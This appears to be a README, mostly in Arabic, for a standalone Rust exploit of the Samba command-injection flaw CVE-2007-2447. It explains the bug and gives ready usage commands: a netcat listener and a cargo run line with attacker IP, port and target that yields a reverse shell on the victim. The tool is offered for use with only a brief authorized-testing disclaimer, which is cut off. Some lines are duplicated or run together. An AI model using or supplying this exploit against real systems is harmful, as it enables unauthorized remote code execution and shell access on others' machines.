
تنفيذ مستقل بلغة Rust لاستغلال CVE-2007-2447 الذي يستهدف Samba smbd 3.0.20-Debian.
تنفيذ مستقل بـ Rust لاستغلال CVE-2007-2447 الذي يستهدف Samba smbd 3.0.20-Debian.
CVE-2007-2447 هي ثغرة حقن أوامر في إصدارات Samba من 3.0.0 إلى 3.0.25rc3. توجد الثغرة في الدالة SamrChangePassword()، التي تفشل في تعقيم إدخال المستخدم بشكل صحيح، مما يسمح للمهاجمين بتنفيذ أوامر عشوائية عبر محارف القشرة (shell metacharacters) في حقل اسم المستخدم أثناء مصادقة SMB.
netcat على الهدف (عادةً ما يكون مثبتًا افتراضيًا)cargo run -- --lhost <attacker-ip> --lport <attacker-port> --target <target-ip>
# Set up a netcat listener
nc -lvnp 4444
# Run the exploit
cargo run -- --lhost 10.10.14.170 --lport 4444 --target 192.168.1.100
--lhost: عنوان IP لجهازك المهاجم--lport: المنفذ الذي سيستقبل اتصال الصدفة العكسية--target: عنوان IP للجهاز الهدفهذه الأداة مخصصة لأغراض تعليمية واختبار الاختراق المصرح به فقط. استخدمها بمسؤولية وفقط على الأنظمة التي تملكها أو لديك إذن صريح بـ